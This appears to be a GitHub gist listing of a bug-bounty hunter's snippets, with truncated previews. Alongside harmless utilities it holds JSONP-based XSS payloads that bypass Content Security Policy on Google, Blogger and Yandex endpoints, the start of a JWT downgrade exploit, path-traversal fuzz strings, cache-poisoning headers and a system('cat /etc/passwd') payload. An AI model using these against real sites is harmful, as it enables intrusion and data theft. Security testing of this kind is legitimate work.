Rafael Rodrigues Lopseg
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from datetime import datetime | |
| import asyncore | |
| from smtpd import SMTPServer | |
| class EmlServer(SMTPServer): | |
| no = 0 | |
| def process_message(self, peer, mailfrom, rcpttos, data, **kwargs): | |
| filename = '%s-%d.eml' % (datetime.now().strftime('%Y%m%d%H%M%S'), | |
| self.no) | |
| print(filename) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "metadata": { | |
| "css": [ | |
| "" | |
| ], | |
| "name": "" | |
| }, | |
| "nbformat": 3, | |
| "nbformat_minor": 0, | |
| "worksheets": [ |
Lopseg
/ jsonbee.txt
Created
December 20, 2019 22:58
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Google.com: | |
| "><script src="https://www.google.com/complete/search?client=chrome&q=hello&callback=alert#1"></script> | |
| "><script src="https://googleads.g.doubleclick.net/pagead/conversion/1036918760/wcm?callback=alert(1337)"></script> | |
| "><script src="https://www.googleadservices.com/pagead/conversion/1070110417/wcm?callback=alert(1337)"></script> | |
| "><script src="https://cse.google.com/api/007627024705277327428/cse/r3vs7b0fcli/queries/js?callback=alert(1337)"></script> | |
| "><script src="https://accounts.google.com/o/oauth2/revoke?callback=alert(1337)"></script> | |
| #Blogger.com: | |
| "><script src="https://www.blogger.com/feeds/5578653387562324002/posts/summary/4427562025302749269?callback=alert(1337)"></script> | |
| #Yandex: | |
| "><script src="https://translate.yandex.net/api/v1.5/tr.json/detect?callback=alert(1337)"></script> |
Lopseg
/ vuln_list.txt
Created
November 9, 2019 09:30
150 vulnerability types that you can submit for. Thanks to @thecybermentor and hackerone.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Account Hijacking | |
| Allocation of Resources Without Limits or Throttling - CWE-770 | |
| Array Index Underflow - CWE-129 | |
| Authentication Bypass Using an Alternate Path or Channel - CWE-288 | |
| Brute Force - CWE-307 | |
| Buffer Over-read - CWE-126 | |
| Buffer Underflow - CWE-124 | |
| Buffer Under-read - CWE-127 | |
| Business Logic Errors - CWE-840 | |
| Classic Buffer Overflow - CWE-120 |
Lopseg
/ filepaths.txt
Created
September 19, 2019 16:22
Here are filepaths that are always good to check if our targets have some of them
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| op/oauth/sketchfab | |
| op/oauth/dropbox |
Lopseg
/ jwt_downgrade.rb
Created
September 1, 2019 20:18
jwt ruby exploits that can be used to exploit JWT downgrade vulnerabilities. RS256 to HS256
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| require 'base64' | |
| require 'openssl' | |
| pub = File.open("public.pem").read | |
| TOKEN = "XXX" | |
| header, payload, signature = TOKEN.split('.') |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /secure/popups/UserPickerBrowser.jspa | |
| WEB-INF/context/db-context-standalone.xml | |
| !.gitignore | |
| !.htaccess | |
| !.htpasswd | |
| %20../ | |
| %2e%2e//google.com | |
| %3f/ | |
| %EXT% | |
| %ff/ |
Lopseg
/ cache poison headers
Created
August 2, 2019 02:34
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| X-Forwarded-Host: wootwoot | |
| X-Host: wootwoot.net | |
| X-Forwarded-Server: wootwoot | |
| X-Original-URL: /wootwoot |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <pre>system('cat /etc/passwd')</pre> |
Lopseg
/ waybackurls.py
Last active
August 3, 2019 10:07
— forked from mhmdiaa/waybackurls.py
Lopseg forked version of waybackurls.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python2 | |
| import requests | |
| import sys | |
| import json | |
| import os | |
| all_urls = [] | |
| urls_wparams = [] | |
| def create_report(all_data,parameters): |